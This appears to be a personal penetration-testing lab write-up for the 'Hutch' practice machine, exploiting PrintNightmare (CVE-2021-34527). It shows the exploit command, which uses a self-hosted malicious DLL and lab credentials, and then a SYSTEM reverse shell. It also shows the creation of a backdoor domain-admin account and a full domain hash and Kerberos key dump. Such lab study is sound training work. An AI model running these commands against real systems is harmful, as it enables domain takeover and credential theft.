CVE-2021-34527

A vulnerability has been found in Microsoft Windows (Operating System) and classified as critical. This vulnerability affects the function RpcAddPrinterDriverEx of the file spoolsv.exe of the component Print Spooler Service. The manipulation of the argument dwFileCopyFlags with an unknown input leads to a access control vulnerability. The CWE definition for the vulnerability is CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. As an impact it is known to affect confidentiality, integrity, and availability.

CVE-2021-34527 is the remote variant of CVE-2021-1675, which uses MS-RPRN and MS-PAR via MSRPC to exploit

It works by exploiting a logic flaw in the MS-RPRN protocol’s RpcAddPrinterDriverEx function.

There’s been another method through the MS-PAR protocol’s the RpcAsyncAddPrinterDriver function. This is similar to RpcAddPrinterDriverEx, but, has far less constraints and is not limited to domain controllers or Windows 10 systems with non-default settings.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch/CVE-2021-34527_v2]
└─$ impacket-rpcdump $IP | grep -iE 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol 
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

These were previously enumerated through the target MSRPC server

Exploit

There is this tool that has a built-in SMB server to host the DLL payload, which makes it handier

Exploitation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch/CVE-2021-34527_v2]
└─$ python3 CVE-2021-34527_v2.py $IP -u fmcsorley -p CrabSharkJellyfish192 -d HUTCH.OFFSEC -proto MS-RPRN -dll printnightmare.dll --local-ip $tun0 -share smb
 
[*] starting PrintNightmare PoC
[+] Self-hosted payload at \\192.168.45.204\smb\printnightmare.dll
 
[*] Attempting target: 192.168.187.122
[*] Connecting to ncacn_np:192.168.187.122[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.45.204\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[-] Exploit returned: SMB SessionError: code: 0xc00000b1 - STATUS_PIPE_CLOSING - The specified named pipe is in the closing state.
[*] Closing SMB Server

Executing the exploit using the credential of the fmcsorley user

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch/CVE-2021-34527_v2]
└─$ nnc 1234                                                                   
listening on [any] 1234 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.187.122] 50915
Windows PowerShell running as user HUTCHDC$ on HUTCHDC
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
hutchdc
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::9df9:8e58:4400:9b3a%3
   IPv4 Address. . . . . . . . . . . : 192.168.187.122
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.187.254

System level compromise

Hashdump

C:\Windows\system32> net user /ADD adm1n Qwer1234 /DOMAIN && net groups "Domain Admins" /DOMAIN /ADD adm1n
The command completed successfully.
The command completed successfully.

Creating a DA user

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch/CVE-2021-34527_v2]
└─$ impacket-secretsdump HUTCH.OFFSEC/adm1n@hutchdc.hutch.offsec -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Target system bootKey: 0xb24173e6ac9aa789ab05a4acceeb27ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bab179eba40e413086aa37742476c646:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HUTCH\HUTCHDC$:aes256-cts-hmac-sha1-96:986a2ea7bd0c20e0d2c5b5102d524d518e570ccc276eb3127b405bdf85a1e0d1
HUTCH\HUTCHDC$:aes128-cts-hmac-sha1-96:b32fce77ee3988aa0bef4b9bb89e5814
HUTCH\HUTCHDC$:des-cbc-md5:454f1ce651d3d523
HUTCH\HUTCHDC$:plain_password_hex:1b393595f43baefa886001e32894303c75f75006ab84ef233e025106c7d57dc9e0c24ab1c808d3a535cb2d2ed2ee4b0b2b61ec203447cecda73bb2bd5411b223fc2df36753a6297fd07d1c2635bffc662a986e1f7fae74d9644b5c91b85da5762ecb1e5428deda72cea479f3e9d52c3d2fe0071132067b65f3010c998f7495063888c8537d6bd689f7060bb6bf332f34ddd8cf50baad25f1187b89b31b9d4f9fea22e2de873c8dffdc9848b82249dfd15f5b5504b2ed26b8c1d3dfd8893c89548aa2c432aa353d8858306c7c9fc48f357c6c0f13c6f48eca60f72281970a5047b839767c59d0814ba88c659821cc275c
HUTCH\HUTCHDC$:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb818f6846ad0c5c47237a32eee5c2c30b0f739c0
dpapi_userkey:0x9c047d0b5fde15f60714f1411579b93a45dd5872
[*] NL$KM 
 0000   41 34 3F B6 A2 15 2F 99  E2 AA 6C 70 8C 5D 08 DA   A4?.../...lp.]..
 0010   C8 D0 7D ED 67 E9 35 73  A0 31 42 22 C5 A3 4C F2   ..}.g.5s.1B"..L.
 0020   CD C3 EE 84 3E 86 26 A0  EC 91 48 AB A1 62 85 19   ....>.&...H..b..
 0030   4F 37 C8 BC 78 4C 6A 54  36 63 95 0E 82 A0 72 57   O7..xLjT6c....rW
NL$KM:41343fb6a2152f99e2aa6c708c5d08dac8d07ded67e93573a0314222c5a34cf2cdc3ee843e8626a0ec9148aba16285194f37c8bc784c6a543663950e82a07257
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3247226bb126aed3663c935f2ab37c1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3c37d961d2fbbc1eb9e4d09f145ad361:::
hutch.offsec\rplacidi:1103:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\opatry:1104:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\ltaunton:1105:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\acostello:1106:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jsparwell:1107:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\oknee:1108:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jmckendry:1109:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\avictoria:1110:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jfrarey:1111:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\eaburrow:1112:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\cluddy:1113:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\agitthouse:1114:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\fmcsorley:1115:aad3b435b51404eeaad3b435b51404ee:83bcf188adc71adef071303fae29c1c7:::
hutch.offsec\domainadmin:1116:aad3b435b51404eeaad3b435b51404ee:8730fa0d1014eb78c61e3957aa7b93d7:::
adm1n:4102:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
HUTCHDC$:1000:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c091e4980477f3f9c4c2e3ad64a08d107c42158956a6301e7d037a66b9637e88
Administrator:aes128-cts-hmac-sha1-96:0152f1d86193a32f6bac28bf653d2e22
Administrator:des-cbc-md5:794054f2da5d34fd
krbtgt:aes256-cts-hmac-sha1-96:dc0de1944fc0218c5129c7b945f294be4940d5c4da9e632bc1c21c38a97974db
krbtgt:aes128-cts-hmac-sha1-96:927cd0e8ad96f8acfe8a76c15e2580d0
krbtgt:des-cbc-md5:023854fd2fd902dc
hutch.offsec\rplacidi:aes256-cts-hmac-sha1-96:7b5d40ea6108d29863a8079220b7b5142803a9c85d8c40ce65a73eed4fc71ab9
hutch.offsec\rplacidi:aes128-cts-hmac-sha1-96:ed21b067b78145b37eff06d98a4828ff
hutch.offsec\rplacidi:des-cbc-md5:980189853220f8a2
hutch.offsec\opatry:aes256-cts-hmac-sha1-96:f87867606af1558ed27996123d2d6393f0330626befe65647e8c179471f0c534
hutch.offsec\opatry:aes128-cts-hmac-sha1-96:c41a8a599028f21664c2bae013b29ecb
hutch.offsec\opatry:des-cbc-md5:f7e51cf1f29145ce
hutch.offsec\ltaunton:aes256-cts-hmac-sha1-96:b5cd286fd8c9666c1e3c4f712cdb1e26b5fd51ac2104dc760d8a7f34fb617e99
hutch.offsec\ltaunton:aes128-cts-hmac-sha1-96:1a43ab7395e1f22ccb879a16f3a1496a
hutch.offsec\ltaunton:des-cbc-md5:7cf1a70145b55d2a
hutch.offsec\acostello:aes256-cts-hmac-sha1-96:34a6712ba826709bfdf7a02e2481f06beff30b1b6f6951daed8f446ec34f8422
hutch.offsec\acostello:aes128-cts-hmac-sha1-96:be0dee1e08c5474b11855f7d06d3a278
hutch.offsec\acostello:des-cbc-md5:3df49e3ed0736bd3
hutch.offsec\jsparwell:aes256-cts-hmac-sha1-96:b4d7e452c10a4555a20fab086aaa36e0fa7cb8d5a8b23df97bddad63f96b6f1d
hutch.offsec\jsparwell:aes128-cts-hmac-sha1-96:f20475c4781be65c52870e18cb4b613c
hutch.offsec\jsparwell:des-cbc-md5:54982c2a51dcefe6
hutch.offsec\oknee:aes256-cts-hmac-sha1-96:6b9a4ba95463961e9d2dcb8b17da7aa350e4d482e33fc81cca053ca333824c47
hutch.offsec\oknee:aes128-cts-hmac-sha1-96:aefb6cafd75fcfaa2fd38a0e56c75eec
hutch.offsec\oknee:des-cbc-md5:ec7a25eae0e94f1c
hutch.offsec\jmckendry:aes256-cts-hmac-sha1-96:22ee68dab0d877d43ee2f138bebbf30707b1c42f79f3753c42d7839116bd8b30
hutch.offsec\jmckendry:aes128-cts-hmac-sha1-96:bef6b24600ce768f636f0a6937da0418
hutch.offsec\jmckendry:des-cbc-md5:58dc1a49f4a45ba4
hutch.offsec\avictoria:aes256-cts-hmac-sha1-96:44d8f8cbc4517741a4f96dabe7ca8ef63d4772a43d79b838e00db7d9cd9963b9
hutch.offsec\avictoria:aes128-cts-hmac-sha1-96:fecfaa6ee425efb4c0fd5c1ab92a444f
hutch.offsec\avictoria:des-cbc-md5:837f9461e5b0fb49
hutch.offsec\jfrarey:aes256-cts-hmac-sha1-96:d0c59d53e3b2fa543b8fa148d7f9f5a8e1c41b5380e23a117ecbbe8ab138f8e5
hutch.offsec\jfrarey:aes128-cts-hmac-sha1-96:7017ee9e695a4c82f2b890e16414abe0
hutch.offsec\jfrarey:des-cbc-md5:df161cf8fddac145
hutch.offsec\eaburrow:aes256-cts-hmac-sha1-96:7c20426d91c8cfa2c0f301bd09dc570c4b7d485c9143db3e7da15644295e327c
hutch.offsec\eaburrow:aes128-cts-hmac-sha1-96:08d33ff5aa4a66054fe4333180b886ba
hutch.offsec\eaburrow:des-cbc-md5:4ca20797cd94b5ad
hutch.offsec\cluddy:aes256-cts-hmac-sha1-96:9f8ccb9ba6b0c8aa8199e300122478d4526be75d67ecc96fdc5e4892f9fd9432
hutch.offsec\cluddy:aes128-cts-hmac-sha1-96:0813d6e021a6117cf35ee8a6c4bda70b
hutch.offsec\cluddy:des-cbc-md5:8a322f1ff404ad89
hutch.offsec\agitthouse:aes256-cts-hmac-sha1-96:ea5768347ddf42e949c4c61c821e1b01be47d4a53485b7a6d8fca9b708a6a5dc
hutch.offsec\agitthouse:aes128-cts-hmac-sha1-96:0887271ba1239c9755738a7ce13345ff
hutch.offsec\agitthouse:des-cbc-md5:3ba23b07ef6d3d7a
hutch.offsec\fmcsorley:aes256-cts-hmac-sha1-96:679828b1625b953fb96470e0712f3bfa7866ee99f260f289dff48a19cd80cc87
hutch.offsec\fmcsorley:aes128-cts-hmac-sha1-96:d12b8c1d7125196020760b917cc5d159
hutch.offsec\fmcsorley:des-cbc-md5:7a9b7cc4496104ab
hutch.offsec\domainadmin:aes256-cts-hmac-sha1-96:8d90904d735e652112c1947fdde2f0b1205d8df1944c286b1d24ec1187dae4aa
hutch.offsec\domainadmin:aes128-cts-hmac-sha1-96:29e412c68977461a3f4ead34c2886402
hutch.offsec\domainadmin:des-cbc-md5:bc10f7df49315dc7
adm1n:aes256-cts-hmac-sha1-96:38724cc8dd0ab4a55d4ca5eefd79766caa32daa0ae33742a642d52507b50228b
adm1n:aes128-cts-hmac-sha1-96:996b8376868045dc1ebe2228e083e703
adm1n:des-cbc-md5:d652929b5eea98f8
HUTCHDC$:aes256-cts-hmac-sha1-96:986a2ea7bd0c20e0d2c5b5102d524d518e570ccc276eb3127b405bdf85a1e0d1
HUTCHDC$:aes128-cts-hmac-sha1-96:b32fce77ee3988aa0bef4b9bb89e5814
HUTCHDC$:des-cbc-md5:7fdff12091618094
[*] Cleaning up...

Domain level compromise

InfoSec LAB

Explorer

Hutch_Privilege_Escalation_2

CVE-2021-34527

Exploit

Exploitation

Hashdump

Interactive Graph View

Table of Contents

Backlinks